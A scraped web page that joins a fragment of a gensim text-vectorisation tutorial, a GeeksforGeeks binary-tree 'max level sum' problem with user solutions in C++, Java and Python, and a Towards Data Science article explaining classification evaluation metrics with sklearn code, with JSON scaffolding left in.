aspect of possible similarities — on apparent semantic relatedness of their texts (words). No hyperlinks, no random-walk static ranks, just a semantic extension over the boolean keyword match." }, { "code": null, "e": 5091, "s": 4968, "text": "#Create a set of text records for each fieldfrom gensim import corporadict_d = corpora.Dictionary(features['description'])" }, { "code": null, "e": 5285, "s": 5091, "text": "Converting a text into the bag-of-words (BoW) format, that is a list of (token_id, token_count) tuples, was done by the attribute of a class gensim.corpora.dictionary.Dictionary() — .doc2bow()." }, { "code": null, "e": 5399, "s": 5285, "text": "#Convert tokenized text (corpora) to vectorscorpus_d = [dict_d.doc2bow(line) for line in features['description']]" }, { "code": null, "e": 5556, "s": 5399, "text": "To get a real number instead of a vector, I used a norm that is a function that assigns a strictly positive length or size to each vector in a vector space." }, { "code": null, "e": 5823, "s": 5556, "text": "#Transform vectors of texts to scalar values (calculating norms of vectors)from numpy import linalg as LAcorpus_d_vec_norm = [LA.norm(vec) for vec in corpus_d]#Replace text descriptions in the database with norms of vectorsfeatures[‘description’] = corpus_d_vec_norm" }, { "code": null, "e": 5873, "s": 5823, "text": "Finally, I got a homogeneous the 7-field dataset." 
}, { "code": null, "e": 6128, "s": 5873, "text": "I used the best-rated machine learning method from the previous tests — Random Forest Regressor — to calculate how the model fits our new dataset. The coefficient of determination, R-squared, was a twice better (~ 0.75), than with 5-field dataset (0.37)." }, { "code": null, "e": 6288, "s": 6128, "text": "Initially, I had the mixed dataset: the first three fields (drop-down menu) are obviously interdependent, and the next three (descriptions) are more fluctuant." }, { "code": null, "e": 6589, "s": 6288, "text": "Due to my hypothesis, descriptions fields are more philosophically (or even psychologically) close to an award value. So, I changed the ML method to the artificial neural network. By the way, this algorithm was rejected in the previous test with 5-field dataset due to its very low R-squared of 0.05." }, { "code": null, "e": 6713, "s": 6589, "text": "However, Multi-layer Perceptron Regressor with just three hidden layers gave a fantastic result with R-squared of 0.999962." }, { "code": null, "e": 7224, "s": 6713, "text": "import sklearnfrom sklearn.neural_network import MLPRegressormlpreg = MLPRegressor(hidden_layer_sizes=(3,), activation=’relu’, solver=’adam’, alpha=0.001, batch_size=’auto’, learning_rate=’adaptive’, learning_rate_init=0.01, power_t=0.5, max_iter=1000, shuffle=True, random_state=9, tol=0.0001, verbose=False, warm_start=False, momentum=0.9, nesterovs_momentum=True, early_stopping=False, validation_fraction=0.1, beta_1=0.9, beta_2=0.999, epsilon=1e-08)" }, { "code": null, "e": 7357, "s": 7224, "text": "1. The obtained results show the suitability of the norm of the vector for replacing a vector of text without significant data loss." }, { "code": null, "e": 7530, "s": 7357, "text": "2. Customers’ verbal description of his/her needs is much closer to a money award amount than drop-down menus, because that text may express human essence or common motive." } ]
Max Level Sum in Binary Tree | Practice | GeeksforGeeks
Given a Binary Tree having positive and negative nodes, find the maximum sum of a level in the given Binary Tree.

Example 1:

Input :
          4
         / \
        2  -5
       / \ / \
     -1  3 -2 6

Output: 6

Explanation :
Sum of all nodes of 0'th level is 4
Sum of all nodes of 1'th level is -3
Sum of all nodes of 2'th level is 6
Hence maximum sum is 6

Example 2:

Input :
        1
       / \
      2   3
     / \   \
    4   5   8
           / \
          6   7

Output : 17

Explanation: Maximum sum is at level 2.

Your Task:
You don't need to read input or print anything. Complete the function maxLevelSum() which takes the root node as input parameter and returns the maximum sum of any horizontal level in the given Binary Tree.

Expected Time Complexity: O(N)
Expected Auxiliary Space: O(N)

Constraints:
1 ≤ N ≤ 10^4

0

harshscode 1 week ago

vector<int> v;
queue<Node*> q;
q.push(root);
while(!q.empty())
{
    int n=q.size();
    int sum=0;
    while(n--)
    {
        Node *temp=q.front();
        q.pop();
        int p=temp->data;
        sum+=p;
        if(temp->left) q.push(temp->left);
        if(temp->right) q.push(temp->right);
    }
    v.push_back(sum);
}
int maxx=v[0];
for(int i=0;i<v.size();i++)
{
    if(v[i]>maxx) maxx=v[i];
}
return maxx;

0

detroix07 1 month ago

class Solution {
  public:
    /* You are required to complete below method */
    int maxLevelSum(Node* root)
    {
        queue<Node*> q;
        q.push(root);
        q.push(NULL);
        int sum = 0;
        int max = INT_MIN;
        while(q.size()!=0)
        {
            Node* Front = q.front();
            q.pop();
            if(Front==NULL)
            {
                if(sum>max) max=sum;
                sum=0;
                if(q.size()==0) break;
                q.push(NULL);
            }
            else
            {
                sum+=Front->data;
                if(Front->left!=NULL) q.push(Front->left);
                if(Front->right!=NULL) q.push(Front->right);
            }
        }
        return max;
    }
};

0

namanshah2275 2 months ago

SHORT SOLUTION : TIME O(N), 0.4 sec

int maxLevelSum(Node* root)
{
    queue<Node*> q;
    int ans = INT_MIN;
    int newans;
    q.push(root);
    while(!q.empty())
    {
        newans = 0;
        int n = q.size();
        while(n--)
        {
            Node* p = q.front();
            newans = newans + p->data;
            q.pop();
            if(p->left) q.push(p->left);
            if(p->right) q.push(p->right);
        }
        if(newans > ans) ans = newans;
    }
    return ans;
}

0

owaischem 3 months ago

PYTHON SOLUTION, TIME TAKEN: 12.7/15.5 (time taken is high due to the use of recursion)

class Solution:
    def maxLevelSum(self, root):
        def height(root):
            if root==None:
                return 0
            left=height(root.left)
            right=height(root.right)
            return max(left,right)+1
        def level_traversal(root,level):
            if root==None:
                return None
            elif level==0:
                list1.append(root.data)
            else:
                level_traversal(root.left,level-1)
                level_traversal(root.right,level-1)
        tall=height(root)
        maximum=-9999999
        list1=[]
        for i in range(tall):
            level_traversal(root,i)
            maximum=max(maximum,sum(list1))
            list1=[]
        return maximum

0

bhushan561 3 months ago

SIMPLEST CPP SOLUTION, TIME COMPLEXITY O(N)

int maxLevelSum(Node* root)
{
    // Your code here
    vector<int>ans;
    queue<Node*>q;
    q.push(root);
    while(!q.empty())
    {
        int sum=0;
        int n=q.size();
        for(int i=0;i<n;i++)
        {
            auto temp=q.front();
            q.pop();
            if(temp->left) q.push(temp->left);
            if(temp->right) q.push(temp->right);
            sum=sum+temp->data;
        }
        ans.push_back(sum);
    }
    return *max_element(ans.begin(),ans.end());
}

0

anshwalgiri 3 months ago

int maxLevelSum(Node* root)
{
    Node * temp = root;
    queue <Node *> nodeQ;
    int sum = 0, prior_sum=INT_MIN, result, count =0;
    if (temp == NULL) return -1;
    nodeQ.push(temp);
    while (nodeQ.empty() == false)
    {
        sum = 0;
        count = nodeQ.size();
        while (count--)
        {
            Node *node = nodeQ.front();
            sum += node -> data;
            nodeQ.pop();
            if (node -> left != NULL) nodeQ.push(node -> left);
            if (node -> right != NULL) nodeQ.push(node -> right);
        }
        result = max (sum, prior_sum); // Keep max value here
        prior_sum = result;
    }
    return result;
}

0

abhishekvicky12345 3 months ago

/*Java Solution*/ class
Solution {
    public int max=-1000;

    public void odd(Stack<Node> s1, Stack<Node> s2)
    {
        Node temp;
        int sum=0;
        while(s1.size()>0)
        {
            temp=s1.pop();
            sum=sum+temp.data;
            if(temp.left!=null) s2.add(temp.left);
            if(temp.right!=null) s2.add(temp.right);
        }
        if(sum>max) max=sum;
        if(s2.size()>0) even(s1,s2);
    }

    public void even(Stack<Node> s1, Stack<Node> s2)
    {
        Node temp;
        int sum=0;
        while(s2.size()>0)
        {
            temp=s2.pop();
            sum=sum+temp.data;
            if(temp.left!=null) s1.add(temp.left);
            if(temp.right!=null) s1.add(temp.right);
        }
        if(sum>max) max=sum;
        if(s1.size()>0) odd(s1,s2);
    }

    public int maxLevelSum(Node root)
    {
        Stack<Node> s1=new Stack<>();
        Stack<Node> s2=new Stack<>();
        if(root==null) return 0;
        s1.add(root);
        odd(s1,s2);
        return max;
    }
}

+1

kronizerdeltac 3 months ago

JAVA SOLUTION - BFS

public int maxLevelSum(Node root) {
    if(root == null) return -1;

    LinkedList<Node> queue = new LinkedList<>();
    queue.addLast(root);
    int maxSum = -(int) 1e9;

    while(queue.size() != 0) {
        int size = queue.size(), sum = 0;
        while(size-- > 0) {
            Node rnode = queue.removeFirst();
            sum += rnode.data;

            if(rnode.left != null) queue.addLast(rnode.left);
            if (rnode.right != null) queue.addLast(rnode.right);
        }
        if(sum > maxSum) maxSum = sum;
    }
    return maxSum;
}

0

mayank2021 3 months ago

C++

class Solution{
  public:
    /*You are required to complete below method */
    int maxLevelSum(Node* root)
    {
        int max=INT_MIN;
        vector<int> levelsum;
        lsum(root, 1, levelsum);
        for(auto i:levelsum)
        {
            if(max<i) max=i;
        }
        return max;
    }

  public:
    void lsum(Node* root, int l, vector<int> &levelsum)
    {
        if(root)
        {
            if(levelsum.size() < l) levelsum.push_back(root->data);
            else levelsum[l-1]=levelsum[l-1]+root->data;
            lsum(root->left, l+1, levelsum);
            lsum(root->right, l+1, levelsum);
        }
    }
};

0

riyu2022 3 months ago

SIMPLE PYTHON ITERATIVE

class Solution:
    def maxLevelSum(self, root):
        # Code here
        if not root:
            return False
        ans = []
        res = []
        q = deque([root])
        while q:
            level = []
            for _ in range(len(q)):
                node = q.popleft()
                level.append(node.data)
                if node.left:
                    q.append(node.left)
                if node.right:
                    q.append(node.right)
            ans.append(level)
        for a in ans:
            res.append(sum(a))
        return max(res)
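For comparison, here is a short recursive (depth-first) sketch in Python that accumulates one running sum per level; it is an illustrative alternative to the BFS solutions above, not taken from the thread, and it assumes the same node.data / node.left / node.right interface as the Python solution above:

class Solution:
    def maxLevelSum(self, root):
        level_sums = []

        def dfs(node, depth):
            if not node:
                return
            # first time this depth is reached, start its running sum at 0
            if depth == len(level_sums):
                level_sums.append(0)
            level_sums[depth] += node.data
            dfs(node.left, depth + 1)
            dfs(node.right, depth + 1)

        dfs(root, 0)
        return max(level_sums)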
[ { "code": null, "e": 352, "s": 238, "text": "Given a Binary Tree having positive and negative nodes. Find the maximum sum of a level in the given Binary Tree." }, { "code": null, "e": 363, "s": 352, "text": "Example 1:" }, { "code": null, "e": 633, "s": 363, "text": "Input : \n 4\n / \\\n 2 -5\n / \\ / \\\n -1 3 -2 6\n\nOutput: 6\n\nExplanation :\nSum of all nodes of 0'th level is 4\nSum of all nodes of 1'th level is -3\nSum of all nodes of 2'th level is 6\nHence maximum sum is 6" }, { "code": null, "e": 645, "s": 633, "text": "\nExample 2:" }, { "code": null, "e": 845, "s": 645, "text": "Input : \n 1\n / \\\n 2 3\n / \\ \\\n 4 5 8\n / \\\n 6 7 \n\nOutput : 17\n\nExplanation: Maximum sum is at level 2." }, { "code": null, "e": 1061, "s": 845, "text": "\nYour Task: \nYou dont need to read input or print anything. Complete the function maxLevelSum() which takes root node as input parameter and returns the maximum sum of any horizontal level in the given Binary Tree." }, { "code": null, "e": 1124, "s": 1061, "text": "\nExpected Time Complexity: O(N)\nExpected Auxiliary Space: O(N)" }, { "code": null, "e": 1150, "s": 1124, "text": "\nConstraints:\n1 ≤ N ≤ 104" }, { "code": null, "e": 1152, "s": 1150, "text": "0" }, { "code": null, "e": 1173, "s": 1152, "text": "harshscode1 week ago" }, { "code": null, "e": 1847, "s": 1173, "text": " vector<int> v; queue<Node*> q; q.push(root); while(!q.empty()) { int n=q.size(); int sum=0; while(n--) { Node *temp=q.front(); q.pop(); int p=temp->data; sum+=p; if(temp->left) q.push(temp->left); if(temp->right) q.push(temp->right); } v.push_back(sum); } int maxx=v[0]; for(int i=0;i<v.size();i++) { if(v[i]>maxx) maxx=v[i]; } return maxx;" }, { "code": null, "e": 1849, "s": 1847, "text": "0" }, { "code": null, "e": 1870, "s": 1849, "text": "detroix071 month ago" }, { "code": null, "e": 2470, "s": 1870, "text": "class Solution { public: /*You are required to complete below method */ int maxLevelSum(Node* root) { queue<Node*> q; q.push(root); q.push(NULL); int sum = 0; int max=INT_MIN; while(q.size()!=0) { Node* Front = q.front(); q.pop(); if(Front==NULL) { if(sum>max) max=sum; sum=0; if(q.size()==0) break; q.push(NULL); } else { sum+=Front->data; if(Front->left!=NULL) q.push(Front->left); if(Front->right!=NULL) q.push(Front->right); } } return max; }};" }, { "code": null, "e": 2472, "s": 2470, "text": "0" }, { "code": null, "e": 2498, "s": 2472, "text": "namanshah22752 months ago" }, { "code": null, "e": 2526, "s": 2498, "text": "SHORT SOLUTION : TIME O(N) " }, { "code": null, "e": 2534, "s": 2526, "text": "0.4 sec" }, { "code": null, "e": 3166, "s": 2536, "text": " int maxLevelSum(Node* root) { queue<Node*> q; int ans = INT_MIN; int newans; q.push(root); while(!q.empty()) { newans = 0; int n = q.size(); while(n--) { Node* p = q.front(); newans = newans + p->data; q.pop(); if(p->left) q.push(p->left); if(p->right) q.push(p->right); } if(newans > ans) ans = newans; } return ans; }}; " }, { "code": null, "e": 3168, "s": 3166, "text": "0" }, { "code": null, "e": 3190, "s": 3168, "text": "owaischem3 months ago" }, { "code": null, "e": 3207, "s": 3190, "text": "PYTHON SOLUTION:" }, { "code": null, "e": 3228, "s": 3207, "text": "TIME TAKEN:12.7/15.5" }, { "code": null, "e": 3277, "s": 3228, "text": "(time taken is high due to the use of recursion)" }, { "code": null, "e": 4038, "s": 3279, "text": "class Solution: def maxLevelSum(self, root): def height(root): if root==None: return 0 left=height(root.left) right=height(root.right) return max(left,right)+1 def 
level_traversal(root,level): if root==None: return None elif level==0: list1.append(root.data) else: level_traversal(root.left,level-1) level_traversal(root.right,level-1) tall=height(root) maximum=-9999999 list1=[] for i in range(tall): level_traversal(root,i) maximum=max(maximum,sum(list1)) list1=[] return maximum" }, { "code": null, "e": 4040, "s": 4038, "text": "0" }, { "code": null, "e": 4063, "s": 4040, "text": "bhushan5613 months ago" }, { "code": null, "e": 4085, "s": 4063, "text": "SIMPLEST CPP SOLUTION" }, { "code": null, "e": 4106, "s": 4085, "text": "TIME COMPLEXITY-O(N)" }, { "code": null, "e": 4673, "s": 4110, "text": "int maxLevelSum(Node* root) { // Your code here vector<int>ans; queue<Node*>q; q.push(root); while(!q.empty()) { int sum=0; int n=q.size(); for(int i=0;i<n;i++) { auto temp=q.front(); q.pop(); if(temp->left) q.push(temp->left); if(temp->right) q.push(temp->right); sum=sum+temp->data; } ans.push_back(sum); } return *max_element(ans.begin(),ans.end()); }" }, { "code": null, "e": 4675, "s": 4673, "text": "0" }, { "code": null, "e": 4699, "s": 4675, "text": "anshwalgiri3 months ago" }, { "code": null, "e": 5509, "s": 4699, "text": "int maxLevelSum(Node* root) { Node * temp = root; queue <Node *> nodeQ; int sum = 0, prior_sum=INT_MIN, result, count =0; if (temp == NULL) return -1; nodeQ.push(temp); while (nodeQ.empty() == false) { sum = 0; count = nodeQ.size(); while (count--) { Node *node = nodeQ.front(); sum += node -> data; nodeQ.pop(); if (node -> left != NULL) nodeQ.push(node -> left ); if (node -> right != NULL) nodeQ.push(node -> right ); } result = max (sum, prior_sum); // Keep max value here prior_sum = result; } return result; }" }, { "code": null, "e": 5511, "s": 5509, "text": "0" }, { "code": null, "e": 5542, "s": 5511, "text": "abhishekvicky123453 months ago" }, { "code": null, "e": 5560, "s": 5542, "text": "/*Java Solution*/" }, { "code": null, "e": 6553, "s": 5562, "text": "class Solution { public int max=-1000; public void odd(Stack<Node> s1,Stack<Node> s2) { Node temp; int sum=0; while(s1.size()>0) { temp=s1.pop(); sum=sum+temp.data; if(temp.left!=null) s2.add(temp.left); if(temp.right!=null) s2.add(temp.right); } if(sum>max)max=sum; if(s2.size()>0) even(s1,s2); } public void even(Stack<Node> s1,Stack<Node> s2) { Node temp;int sum=0; while(s2.size()>0) { temp=s2.pop(); sum=sum+temp.data; if(temp.left!=null) s1.add(temp.left); if(temp.right!=null) s1.add(temp.right); } if(sum>max)max=sum; if(s1.size()>0) odd(s1,s2); } public int maxLevelSum(Node root) { Stack<Node> s1=new Stack<>(); Stack<Node> s2=new Stack<>(); if(root==null) return 0; s1.add(root); odd(s1,s2); return max; }}" }, { "code": null, "e": 6556, "s": 6553, "text": "+1" }, { "code": null, "e": 6583, "s": 6556, "text": "kronizerdeltac3 months ago" }, { "code": null, "e": 6603, "s": 6583, "text": "JAVA SOLUTION - BFS" }, { "code": null, "e": 6685, "s": 6605, "text": "public int maxLevelSum(Node root) { if(root == null) return -1;" }, { "code": null, "e": 6795, "s": 6685, "text": " LinkedList<Node> queue = new LinkedList<>(); queue.addLast(root); int maxSum = -(int) 1e9;" }, { "code": null, "e": 6984, "s": 6795, "text": " while(queue.size() != 0) { int size = queue.size(), sum = 0; while(size-- > 0) { Node rnode = queue.removeFirst(); sum += rnode.data;" }, { "code": null, "e": 7152, "s": 6984, "text": " if(rnode.left != null) queue.addLast(rnode.left); if (rnode.right != null) queue.addLast(rnode.right);" }, { "code": null, "e": 7253, "s": 7152, "text": " } if(sum > maxSum) maxSum = sum; } 
return maxSum; }" }, { "code": null, "e": 7255, "s": 7253, "text": "0" }, { "code": null, "e": 7278, "s": 7255, "text": "mayank20213 months ago" }, { "code": null, "e": 7524, "s": 7278, "text": "c++class Solution{ public: /*You are required to complete below method */ int maxLevelSum(Node* root) { int max=INT_MIN; vector<int> levelsum; lsum(root, 1, levelsum); for(auto i:levelsum) { if(max<i) max=i; }" }, { "code": null, "e": 7919, "s": 7524, "text": " return max; } public: void lsum(Node* root, int l,vector<int> &levelsum ) { if(root) { if(levelsum.size() < l) levelsum.push_back(root->data); else levelsum[l-1]=levelsum[l-1]+root->data; lsum(root->left, l+1, levelsum); lsum(root->right, l+1, levelsum); } } };" }, { "code": null, "e": 7921, "s": 7919, "text": "0" }, { "code": null, "e": 7942, "s": 7921, "text": "riyu20223 months ago" }, { "code": null, "e": 7966, "s": 7942, "text": "SIMPLE PYTHON ITERATIVE" }, { "code": null, "e": 8541, "s": 7966, "text": "class Solution:\n def maxLevelSum(self, root):\n # Code here\n if not root:\n return False\n ans = []\n res = []\n q = deque([root])\n while q:\n level = []\n for _ in range(len(q)):\n node = q.popleft()\n level.append(node.data)\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n ans.append(level)\n for a in ans:\n res.append(sum(a))\n return max(res)" }, { "code": null, "e": 8687, "s": 8541, "text": "We strongly recommend solving this problem on your own before viewing its editorial. Do you still\n want to view the editorial?" }, { "code": null, "e": 8723, "s": 8687, "text": " Login to access your submissions. " }, { "code": null, "e": 8733, "s": 8723, "text": "\nProblem\n" }, { "code": null, "e": 8743, "s": 8733, "text": "\nContest\n" }, { "code": null, "e": 8806, "s": 8743, "text": "Reset the IDE using the second button on the top right corner." }, { "code": null, "e": 8954, "s": 8806, "text": "Avoid using static/global variables in your code as your code is tested against multiple test cases and these tend to retain their previous values." }, { "code": null, "e": 9162, "s": 8954, "text": "Passing the Sample/Custom Test cases does not guarantee the correctness of code. On submission, your code is tested against multiple test cases consisting of all possible corner cases and stress constraints." }, { "code": null, "e": 9268, "s": 9162, "text": "You can access the hints to get an idea about what is expected of you as well as the final solution code." } ]
How to check if a string contains only upper case letters in Python?
We can check if a string contains only upper case letters in two ways. The first is the isupper() method. print('Hello world'.isupper()) print('HELLO'.isupper()) False True You can also use a regex for the same result. To match only uppercase letters, we can call re.match(regex, string) with the regex "^[A-Z]+$". import re print(bool(re.match('^[A-Z]+$', '123aAbc'))) print(bool(re.match('^[A-Z]+$', 'ABC'))) False True
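Note that the two checks are not strictly equivalent: isupper() only looks at the cased characters, while the regex requires every character to be an uppercase A-Z letter. A small illustrative sketch (the sample strings are made up for demonstration):

import re

s = 'HELLO 123'
# isupper() ignores the digits and the space, so this prints True
print(s.isupper())
# the regex rejects anything outside A-Z, so this prints False
print(bool(re.match('^[A-Z]+$', s)))
# re.fullmatch anchors the whole string without needing ^ and $
print(bool(re.fullmatch('[A-Z]+', 'HELLO')))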
[ { "code": null, "e": 1171, "s": 1062, "text": "We can check if a string contains only upper case letters using 2 methods. First is using method isupper(). " }, { "code": null, "e": 1228, "s": 1171, "text": "print( 'Hello world'.isupper())\nprint('HELLO'.isupper())" }, { "code": null, "e": 1239, "s": 1228, "text": "False\nTrue" }, { "code": null, "e": 1384, "s": 1239, "text": "You can also use regexes for the same result. For matching only uppercase, we can call the re.match(regex, string) using the regex: \"^[A-Z]+$\". " }, { "code": null, "e": 1478, "s": 1384, "text": "import re\nprint(bool(re.match('^[A-Z]+$', '123aAbc'))\nprint(bool(re.match('^[A-Z]+$', 'ABC'))" }, { "code": null, "e": 1489, "s": 1478, "text": "False\nTrue" } ]
Evaluation Metrics for Classification Explained | by Eunjoo Byeon | Towards Data Science
Evaluation metric refers to a measure that we use to evaluate different models. Choosing an appropriate evaluation metric is a decision problem that requires a thorough understanding of the goal of a project and is a fundamental step before all modeling process that follows. So why is it so important, and how should we choose? Let’s say you live in a city where it is sunny about 300 days a year. During the other 65 days, it gets very uncomfortable with heavy rain or snow. In this imaginary world, there are only two weather apps. One app predicts the weather correctly 80% of the time, while the other one is right about 70% of the time. Which app would you choose? If an app always predicts sunny in this city, this app will be 80% correct, even though it never predicts bad weather accurately. In this case, this app is useless! On the other hand, the other app might fail to predict the sunny weather about 30% of the time, but it will tell you about bad weather accurately over 80% of the time. In this case, this app that correctly predicts the weather 70% of the time is much more useful than the 80% app. As we can see here, how we choose to evaluate our model can tell vastly different information about our data. It must be determined by the goal of the project and the properties of the dataset. No data will be without its variance, and no model can explain the world perfectly. So we must know where we would rather have such prediction errors to happen. When a model makes a binary prediction, there are 4 possible outcomes. A model can predict yes (positive) or no (negative), and it can either be correct (true) or wrong (false). The same logic applies when a model is making a multi-class prediction. The model predicts yes or no for an individual class, and it can be right or it can be wrong, and we decide how to combine these individual outcomes. But how we may interpret a model goes beyond these four outcomes. For one, true positive (TP) involves two events: model prediction and the actual state. Our interpretation can change based on how we want to prioritize these two events. We can see whether the model predicted positive when the actual value was positive, or we can see whether the actual value was positive when the model predicted positive. Let’s say when the weather is sunny, there is an 80% chance that the app would predict it to be sunny. But this does not tell us anything useful in this context. Instead, we should see how often the weather is sunny when the app says so. This will tell us how precise the app’s prediction is in predicting sunny days. This is the precision metric, representing the probability of the model being correct out of all the times model said yes. from sklearn.metrics import precision_scoreprecision_score(actual_y, predicted_y)# scoring parameter: ‘precision’ But sometimes knowing the probability of positive prediction out of all positive cases might be more important. Imagine we are predicting whether a food is poisonous or not. The precision of a model (a chance of food being poisonous when it is predicted to be) is not as important as predicting food to be poisonous when it is poisonous. Because if the model says it’s poisonous we can simply not eat it, but if it fails to tell us that, we risk eating poisonous food. So we want a model that has a high probability of predicting positive when food is poisonous. This is a case for the recall or sensitivity metric. It’s also called the true positive rate. 
It represents how sensitive our model is in detecting positive cases. from sklearn.metrics import recall_scorerecall_score(actual_y, predicted_y)# scoring parameter: ‘recall’ But what if both of these are important? In other words, what should we do when not missing positive cases and not missing negative cases are equally important? Imagine you are predicting a disease that can be cured by a certain treatment. But this treatment can be detrimental to those without the disease. In this case, we need a model that is sensitive to detecting positive cases and equally precise in its detection. That’s when the F1 Score comes into play. F1 Score is the harmonic mean of precision and recall, an average between precision and recall ratios. from sklearn.metrics import f1_scoref1_score(actual_y, predicted_y)# scoring parameter: ‘f1’ Precision and recall metrics focus on predicting positive cases: saying yes to the question of ‘Is this ___?’. But as we saw earlier there are two different ways a model can be correct: it can say yes when it should say yes, and it can say no when it should say no. Accuracy is a probability of being correct in both of these cases. We can use accuracy when classes are equally balanced. For example, let’s say we want to predict whether a picture is a dog or not. We just want the model to say yes when it’s a dog, and no when it’s not. Saying that it’s a dog when it is a cat does not have any different consequences than saying that it’s not a dog when it is a dog. In this case, we can use accuracy. from sklearn.metrics import accuracy_scoreaccuracy_score(actual_y, predicted_y)# scoring parameter: ‘accuracy’ Lastly, specificity is a sensitivity of predicting the negative cases (probability of predicting negatives out of all negative cases). In other words, we can use specificity when it’s more important to not miss negative cases than to be wrong. Let’s say you want to know if the water from a well is drinkable or not. You’d rather mark drinkable water not drinkable than to wrongfully mark undrinkable ‘drinkable’. If we swap our positive and negative and ask a question of ‘is this water contagious?’, we would be using sensitivity instead of specificity. Specificity does not have a built-in function within the Sci-kit Learn package. Instead, you can either use sensitivity and swap positive and negative cases or calculate it through custom function using the confusion matrix. # custom function to calculate specificity for binary classificationfrom sklearn.metrics import confusion_matrixdef specificity_score(y_true, y_predicted): cm = confusion_matrix(y_true, y_predicted) return cm[0, 0] / (cm[0, 0] + cm[0, 1])print(specificity_score(y_true, y_predicted)) We reviewed how to choose evaluation metrics for our binary classification data. But what do we do when our target is not yes or no but comprised of multiple categories? One way is to count each outcome globally regardless of within-class distribution and calculate the metric. We can accomplish this by using the micro average. Let’s think about what it means to use global counts. If we just look at the global outcome, we don’t have the four outcomes as before (TP, TN, FP, FN). Instead we have cases that are true (prediction = actual class) or false (prediction != actual class). Therefore, the micro precision, micro recall, and accuracy all represent the probability of accurate prediction and are equal. Also since the F1 Score is the harmonic mean of precision and recall, the micro F1 Score is the same as other metrics. 
# these are all the samerecall_score(actual_y, predicted_y, average = 'micro')precision_score(actual_y, predicted_y, average = 'micro')accuracy_score(actual_y, predicted_y)f1_score(actual_y, predicted_y, average = 'micro')# scoring parameter: 'f1_micro', 'recall_micro', 'precision_micro' Counting global outcomes disregards the distribution of predictions within each class (it just counts how many got it right). This can be helpful when the dataset has classes that are highly imbalanced and when we do not care about controlling prediction errors in any specific class. But as we discussed above, many of our problems do involve having specific control over where prediction errors come from. Another method to deal with multi-class is to simply calculate the binary measures for each class. For example, if our target variable can be either cat, dog, or bird, we get a binary yes or no answer for each prediction. Is this a cat? Is this a dog? Is this a bird? This will lead to as many scores as a number of our target classes. Then we can aggregate these scores and turn them into a single metric using a macro average or weighted average. Macro average calculates metrics for individual class then computes the average of them. This means that it gives equal weight to the results returned from each class regardless of their overall size. So it is not sensitive to the size of each class, but it takes the performance of individual class more seriously even when it’s a minority. Therefore, the macro average is a good measure if predicting minority class well is as important as the overall accuracy and we also believe that there is a reliable amount of information in the minority class to represent the ground truth pattern accurately. The macro average recall score is the same as the balanced accuracy in multi-class problems. print(f1_score(actual_y, predicted_y, average = 'macro'))print(precision_score(actual_y, predicted_y, average = 'macro'))# below two are the same measuresfrom sklearn.metrics import balanced_accuracy_score, recall_scoreprint(recall_score(actual_y, predicted_y, average = 'macro'))print(balanced_accuracy_score(actual_y, predicted_y))# scoring parameter: 'f1_macro', 'recall_macro', ...etc. To recap, the micro average gives equal weight to individual observations, and the macro average gives equal weight to individual classes. The macro average by definition does not care about how much data each class has. So even when the minority class does not have enough data to show a reliable pattern, it will still weigh the minority class equally. If this is the case, we might want to consider the overall size of each class by using a weighted average. # we can also compute precision, recall, and f1 at the same timefrom sklearn.metrics import precision_recall_fscore_supportprecision_recall_fscore_support(actual_y, predicted_y, average = 'weighted')# scoring parameter: 'f1_weighted', 'recall_weighted', ...etc. Each of the metrics we discussed so far individually tells a part of a story, and that was why we wanted to make sure our goal is clear and aligns with the metric we choose. But what if we just want a measure that can holistically tell us how our model classification is doing relative to a random chance? Cohen’s Kappa compares the classifier’s performance to that of a random classifier. Naturally, it takes the class imbalance into account as the random classifier will rely on the distribution of each class. Unlike other measures that are probabilities, Cohen’s Kappa ranges from -1 to 1. 
from sklearn.metrics import cohen_kappa_scoreprint(cohen_kappa_score(actual_y, predicted_y)) We looked at how each evaluation metric for binary and multi-class classification serves a different kind of problem, and why it’s important to care about the metric we choose. I tried to go over the most foundational measures in plain English. But I still left off another very important metric, the ROC/AUC score, which I will discuss in another post sometime.
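As a quick recap of the measures covered here, the sketch below (with made-up labels, purely for illustration) puts them side by side on one tiny binary example:

from sklearn.metrics import (accuracy_score, precision_score, recall_score,
                             f1_score, cohen_kappa_score)

# made-up ground truth and predictions, for illustration only
y_true = [1, 0, 1, 1, 0, 1, 0, 0]
y_pred = [1, 0, 0, 1, 0, 1, 1, 0]

print(accuracy_score(y_true, y_pred))     # fraction of all predictions that are correct
print(precision_score(y_true, y_pred))    # correct out of everything predicted positive
print(recall_score(y_true, y_pred))       # correct out of everything actually positive
print(f1_score(y_true, y_pred))           # harmonic mean of precision and recall
print(cohen_kappa_score(y_true, y_pred))  # agreement beyond a chance-level classifier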
[ { "code": null, "e": 501, "s": 172, "text": "Evaluation metric refers to a measure that we use to evaluate different models. Choosing an appropriate evaluation metric is a decision problem that requires a thorough understanding of the goal of a project and is a fundamental step before all modeling process that follows. So why is it so important, and how should we choose?" }, { "code": null, "e": 843, "s": 501, "text": "Let’s say you live in a city where it is sunny about 300 days a year. During the other 65 days, it gets very uncomfortable with heavy rain or snow. In this imaginary world, there are only two weather apps. One app predicts the weather correctly 80% of the time, while the other one is right about 70% of the time. Which app would you choose?" }, { "code": null, "e": 1289, "s": 843, "text": "If an app always predicts sunny in this city, this app will be 80% correct, even though it never predicts bad weather accurately. In this case, this app is useless! On the other hand, the other app might fail to predict the sunny weather about 30% of the time, but it will tell you about bad weather accurately over 80% of the time. In this case, this app that correctly predicts the weather 70% of the time is much more useful than the 80% app." }, { "code": null, "e": 1644, "s": 1289, "text": "As we can see here, how we choose to evaluate our model can tell vastly different information about our data. It must be determined by the goal of the project and the properties of the dataset. No data will be without its variance, and no model can explain the world perfectly. So we must know where we would rather have such prediction errors to happen." }, { "code": null, "e": 2044, "s": 1644, "text": "When a model makes a binary prediction, there are 4 possible outcomes. A model can predict yes (positive) or no (negative), and it can either be correct (true) or wrong (false). The same logic applies when a model is making a multi-class prediction. The model predicts yes or no for an individual class, and it can be right or it can be wrong, and we decide how to combine these individual outcomes." }, { "code": null, "e": 2452, "s": 2044, "text": "But how we may interpret a model goes beyond these four outcomes. For one, true positive (TP) involves two events: model prediction and the actual state. Our interpretation can change based on how we want to prioritize these two events. We can see whether the model predicted positive when the actual value was positive, or we can see whether the actual value was positive when the model predicted positive." }, { "code": null, "e": 2893, "s": 2452, "text": "Let’s say when the weather is sunny, there is an 80% chance that the app would predict it to be sunny. But this does not tell us anything useful in this context. Instead, we should see how often the weather is sunny when the app says so. This will tell us how precise the app’s prediction is in predicting sunny days. This is the precision metric, representing the probability of the model being correct out of all the times model said yes." }, { "code": null, "e": 3007, "s": 2893, "text": "from sklearn.metrics import 